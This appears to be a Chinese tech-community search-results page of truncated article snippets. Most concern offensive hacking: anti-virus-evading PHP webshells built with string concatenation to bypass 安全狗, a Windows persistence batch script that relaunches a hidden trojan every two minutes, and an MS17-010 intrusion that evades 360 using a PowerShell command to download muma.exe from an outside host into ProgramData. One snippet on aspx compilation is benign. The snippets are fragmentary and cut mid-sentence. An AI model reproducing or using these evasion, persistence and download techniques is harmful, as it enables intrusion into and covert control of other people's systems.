首页
学习
活动
专区
工具
TVP
发布
精选内容/技术社群/优惠产品,尽在小程序
立即前往

杀技巧 | PHP杀木马绕过某盾

对于网站木马总重要的就是隐匿性和杀.在说杀之前,我想先说说有关于隐匿性的两个小细节....杀: 杀最重要的目的就是尽可能的减少静态特征以及关键字的拼接 常用的杀技巧: 1.字符串拼接 $a = ‘ev’; $b = ‘al’; $c = $a....注意:为了方便理解下面的杀小马,我用payload作为变量名,但是有些杀毒软件会根据变量名进行查杀,请不要用$payload诸如此类的变量名....下面我以一个过安全狗的小马为例,抛砖引玉,希望对大家编写杀木马有所帮助. ? ? 成功躲避检测. 下面是ma1.php的源代码,只有短短的42行. ?...还有一些骚操作,比如文件包含,txt文档放源码,内存马等等,每个人的思路都不一样,多看看别人的杀马怎么写的,你编写木马水平一定会提高。

2.2K30
  • 您找到你想要的搜索结果了吗?
    是的
    没有找到

    解密aspxaspx.cs的关系

    下面接着分析asp这个类.可以看出来其中的奥秘,aspx其实就是做了一个html的拼接的处理~!! 1)为什么可以再aspx中页面中写C#代码呢?...接着仔细的分析后发现: aspx中写的“=”被编译成了response.write();了; ?...接着分析aspx这个文件:实现了IHttpHandler这个接口,就可以看做是实现了HttpHander这个接口,接着就理解了,aspx只不过是特殊的一般处理程序; ?...4、在反编译工具中,aspx文件会最终编译生成了 一个类,继承了aspx.cs这个类(ASPTest1),《简单理解就是说asp这个编译生成类,是aspx.cs这个类的子类》,,,,所以aspx.cs这个类中修饰符至少是...protected级别的,这样子类aspx才可以访问父类中的成员~!!

    14K10

    Windows权限维持

    进程迁移 针对查杀木马进程这个措施,我们可以将木马进程迁移到系统正常的进程当中 对于查杀木马进程,我们还有一种解决办法,设置CMD定时脚本,创建隐蔽账号,登录创建的账号执行该脚本: 这个bat脚本的代码如下...我们将杀马放在 c:\windows\temp 目录下,杀马的名字改为 run.exe @echo off set INTERVAL=120 :Again echo start server...C: cd C:\windows\temp start run.exe timeout %INTERVAL% goto Again 然后运行这个脚本,这个脚本会每隔2分钟(120秒)执行杀木马...实战中我们可以将120秒的时间适当延长,杀马的名字也可以修改为更具有迷惑性的名字。...这样,如果防守方只是杀掉了杀马的进程,而没有杀掉我们的这个bat脚本的cmd.exe进程的话,我们的这个bat脚本还会定时执行杀马的。

    1.4K20

    MS17-010永恒之蓝绕过数字上线

    已代理进内网,通过扫描发现内网某台主机存在有MS17-010,但是因为这台机器上存在360而无法直接利用,不过可以通过ms17_010_command模块执行命令,现在我们需要考虑的是如何绕过360将杀木马落地到目标磁盘...0x03 落地测试 开始我们是想直接写一个vbs下载者脚本远程下载一个杀木马,或者是将杀木马转为base64/hex编码后写入再使用certutil命令解码落地文件,最后执行上线。...);$scriptBlock.Invoke() (2) 文件落地执行上线 我们也可以将以上Powershell命令稍微改下,不直接执行Payload上线,而是改为可绕过360进行文件下载落地的命令,将杀木马下载落地到磁盘...powershell (Invoke-RestMethod -Uri \"http://192.168.1.110/muma.exe\" -OutFile \"C:\\ProgramData\\muma.exe\") 杀木马成功落地到磁盘...Result; [IO.File]::WriteAllBytes('muma.exe', $content) 0x05 思路拓展 (1) 如果这个内网有其他已控机器,可以在这台机器上开启一个临时的匿名共享,将杀木马放在这个匿名共享的目录中

    38110
    领券